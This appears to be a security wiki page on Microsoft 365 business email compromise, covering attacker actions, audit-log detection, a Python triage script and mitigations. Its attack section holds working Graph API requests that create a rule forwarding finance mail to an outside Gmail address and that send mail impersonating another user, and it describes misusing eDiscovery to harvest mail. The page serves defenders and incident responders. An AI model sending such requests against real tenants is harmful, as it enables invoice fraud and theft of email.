
M365 Business Email Compromise


Last updated 1 year ago

What Is BEC (Business Email Compromise)?

Attack

Once an attacker gains access to a compromised mailbox, they may further perform actions on objectives like:

  • Grant permissions to mailboxes

  • Malicious forwarding rules

  • Creating new users

  • OAuth abuse

  • Disabling audit logging

  • Abuse of eDiscovery (search for emails and exfiltrate them)

  • Credential pilfering

  • Recon on security incident

Example attack flow

The ability to perform these actions depends on the permissions the compromised account holds:

  • Read emails on account

  • Run an eDiscovery search for the keywords "salary" or "bonus" in the title.

  • Create a forwarding rule that sends emails containing "invoice" or "finance" keywords to a third-party mailbox and marks them as read.

  • Add "SendAs" permission to users (requires admin privs)

  • Add a member to a role, e.g. Exchange Administrator (requires admin privs)

Leveraging Graph API for BEC

Some actions require administrative consent:

  • Adding members to groups

Creating Malicious Inbox Rule

The following rule forwards any email containing finance keywords to a malicious Gmail account.

Send a POST request to:

  • https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules

Body of POST request:

{
    "displayName": "sussy bussy",
    "sequence": 2,
    "isEnabled": true,
    "conditions": {
        "subjectContains": [
            "invoice",
            "banking",
            "finance",
            "accounting"
        ]
    },
    "actions": {
        "forwardTo": [
            {
                "emailAddress": {
                    "name": "abe lincan",
                    "address": "noahrincon0@gmail.com"
                }
            }
        ],
        "stopProcessingRules": true
    }
}

Send an email as another user

An administrative user must assign the "Send on behalf of" permission to the compromised user account. In the example below, Bob Jones is able to send emails on behalf of Alex Wilber.

Impersonate users with the SendAs function:

  • POST Request: https://graph.microsoft.com/v1.0/me/sendMail

Request body:

{
    "message": {
        "subject": "Expenses Required",
        "body": {
            "contentType": "Text",
            "content": "Please expense this request, it is urgent."
        },
        "toRecipients": [
            {
                "emailAddress": {
                    "address": "LeeG@vk1zm.onmicrosoft.com"
                }
            }
        ],
        "from": {
            "emailAddress": {
                "address": "AlexW@vk1zm.onmicrosoft.com"
            }
        }
    }
}

Leverage eDiscovery to Search

Navigate to the Purview Compliance portal: https://compliance.microsoft.com/homepage

This allows you to create a case and search with conditions across Exchange, Yammer, Teams, SharePoint, OneDrive, etc. Useful for pilfering credentials or reading the contents of emails.

Create a search in eDiscovery and export results.

Detect

What logs are available?

Primary:

  • UAL

  • Azure Audit Logs

  • Sign-Ins

  • Azure Activity Logs

  • Message Tracing Logs

Secondary:

  • Azure AD Provisioning Logs

  • Azure Resource Logs (must be enabled first)

  • Diagnostic Logs

  • Security Reports

Log Retention:

| Log Source         | Azure AD Free | Azure AD P1                                | Azure AD P2                                |
| ------------------ | ------------- | ------------------------------------------ | ------------------------------------------ |
| Audit Logs         | 7 Days        | 30 Days                                    | 30 Days                                    |
| Sign In Logs       | 7 Days        | 30 Days                                    | 30 Days                                    |
| Unified Audit Logs | 30 Days       | Up to 1 year depending on retention policy | Up to 1 year depending on retention policy |

It is best to push these logs into a SIEM, Sentinel, or an external account to preserve evidence beyond the retention window.

Emails Accessed

UAL Operations:

  • MailItemsAccessed: Messages read or accessed (only logged for E5 licenses).

  • FileAccessed: User accessed a file on SharePoint or OneDrive.

Find the MailItemsAccessed log entry and feed its message identifiers into Explorer or Message Trace to locate the specific email.

Ediscovery

UAL Operations:

  • SearchStarted/SearchCreated: Content search was started

  • SearchExported: Results were exported

  • SearchExportDownloaded: Export was downloaded

  • SearchPreviewed/PreviewItemListed: Previewed search results

  • SearchRemoved: Search was deleted

  • CaseAdded/Removed: Case management in eDiscovery.

An admin must grant the user permission before they can use eDiscovery.

Microsoft alerts on this activity.

Email Forwarding Rules

UAL Operations:

  • New-InboxRule - Inbox Rule Created

  • Set-InboxRule - User modified an inbox rule using OWA

  • UpdateInboxRule - Inbox rule was modified, deleted, or created by the mailbox owner

  • Move - Message was moved to another folder

By default, forwarding rules are disabled under Microsoft's "secure by default" principles. Most companies have re-enabled this.

Exchange Permission Abuse:

SendOnBehalf and accessing other mailboxes require admin privs.

UAL Operations:

  • Add-MailboxPermission - Admin assigned FullAccess mailbox permission to a user, allowing them to read/manage another inbox.

  • AddFolderPermission/UpdateFolderPermission - Allows a user to access a folder and the messages/mail within it.

  • SendAs - Message was sent using SendAs permission

  • SendOnBehalf - Message was sent with SendOnBehalf permission

Message sent to nebula from AlexW (on behalf of AlexW).

The IDs at the end are object IDs for users. The malicious user was granted permission to SendOnBehalf of another user: the Trustee is able to send on behalf of the Identity.

[
    {
        "Name": "Identity",
        "Value": "NAMPR16A009.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/vk1zm.onmicrosoft.com/d8d0fe46-8005-4853-98bb-f8c233a826f6"
    },
    {
        "Name": "Trustee",
        "Value": "NAMPR16A009.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/vk1zm.onmicrosoft.com/10b46204-5dac-441a-8b07-3ea8d6605984"
    },
    {
        "Name": "AccessRights",
        "Value": "SendAs"
    }
]
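To turn the Email Forwarding Rules and Exchange Permission Abuse operations above into a first-pass triage, here is an added example (not part of the original page or any Microsoft tooling) that walks exported UAL AuditData records and flags inbox rules forwarding to external addresses, finance-keyword subject filters with MarkAsRead/DeleteMessage, and FullAccess/SendAs grants. The tenant domain and the sample records are constructed; real records come from Search-UnifiedAuditLog, whose Exchange admin operations carry a Parameters list of Name/Value pairs as shown in the JSON above.

```python
import re
# Constructed sample AuditData records, not from a real tenant. Real ones come from
# Search-UnifiedAuditLog; Exchange admin operations carry a "Parameters" Name/Value list.
SAMPLE_UAL = [
    {"Operation": "New-InboxRule", "UserId": "bob@contoso.example", "Parameters": [
        {"Name": "Name", "Value": "sussy bussy"},
        {"Name": "SubjectContainsWords", "Value": "invoice;finance;banking"},
        {"Name": "ForwardTo", "Value": "abe lincan [SMTP:drop@gmail.example]"},
        {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "Set-InboxRule", "UserId": "alice@contoso.example", "Parameters": [
        {"Name": "Identity", "Value": "Newsletters"},
        {"Name": "MoveToFolder", "Value": "Archive"}]},
    {"Operation": "Add-RecipientPermission", "UserId": "admin@contoso.example", "Parameters": [
        {"Name": "Identity", "Value": "AlexW"},
        {"Name": "Trustee", "Value": "BobJ"},
        {"Name": "AccessRights", "Value": "SendAs"}]},
]
INTERNAL_DOMAINS = {"contoso.example"}  # assumed accepted domains of the tenant
FINANCE_KEYWORDS = {"invoice", "banking", "finance", "accounting"}
RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
PERMISSION_OPS = {"Add-MailboxPermission", "Add-RecipientPermission"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

def params(record):
    """Flatten the Parameters list of {Name, Value} pairs into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}

def triage(record, internal=INTERNAL_DOMAINS, keywords=FINANCE_KEYWORDS):
    """Return findings for one record; an empty list means nothing suspicious."""
    op, p, findings = record.get("Operation"), params(record), []
    if op in RULE_OPS:
        # Any SMTP address in a forward/redirect parameter outside the tenant is external.
        targets = [a for k in FORWARD_PARAMS for a in EMAIL_RE.findall(p.get(k, ""))]
        external = [a for a in targets if a.rsplit("@", 1)[1].lower() not in internal]
        if external:
            findings.append("forwards to external " + ", ".join(external))
        words = {w.strip().lower() for w in p.get("SubjectContainsWords", "").split(";") if w}
        if words & keywords:
            findings.append("subject filter on " + ", ".join(sorted(words & keywords)))
        if p.get("MarkAsRead") == "True" or p.get("DeleteMessage") == "True":
            findings.append("hides matched mail (MarkAsRead/DeleteMessage)")
    elif op in PERMISSION_OPS and any(r in p.get("AccessRights", "") for r in ("FullAccess", "SendAs")):
        trustee = p.get("Trustee") or p.get("User", "?")
        findings.append(f"{p['AccessRights']} on {p.get('Identity', '?')} granted to {trustee}")
    return findings

def triage_all(records):
    """(UserId, Operation, findings) for every record that produced at least one finding."""
    return [(r["UserId"], r["Operation"], f) for r in records if (f := triage(r))]
```

Running triage_all(SAMPLE_UAL) surfaces the forwarding rule and the SendAs grant while the benign Archive rule is ignored; feed it the AuditData column of a UAL export to triage a real case.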

BEC Persistence:

Azure Audit Logs Operations:

All of these require admin privs:

  • Add member to role - Added a user to an admin role in M365

  • Add member to group - Added a user to a group in Azure AD

  • Updated group - Updating property on a group

  • Add service principal credentials - Adding a secret to a service principal in Azure AD

Mitigate

Proactive Steps

  • Ensure MFA is enabled on all accounts; if an account is compromised, reset the password and revoke its tokens.

  • Enforce strong password policy.

  • Forward all M365/Azure logs to a SIEM.

  • Block any mail forwarding to an external domain

  • Create alerting rules for permissions being granted to users/forwarding rules being created/new users being created.

Disable Forwarding Rules to Outbound

This is turned off by default.

  • PwC Business Email Compromise Guide (GitHub: PwC-IR/Business-Email-Compromise-Guide, PwC-Business_Email_Compromise-Guide.pdf)

  • Graph Explorer | Try Microsoft Graph APIs (Microsoft Graph) - GUI Graph API view

  • Get started with the Microsoft Graph PowerShell SDK (Microsoft Learn) - PowerShell Graph API

  • Microsoft Graph REST API v1.0 endpoint reference (Microsoft Learn) - All available API requests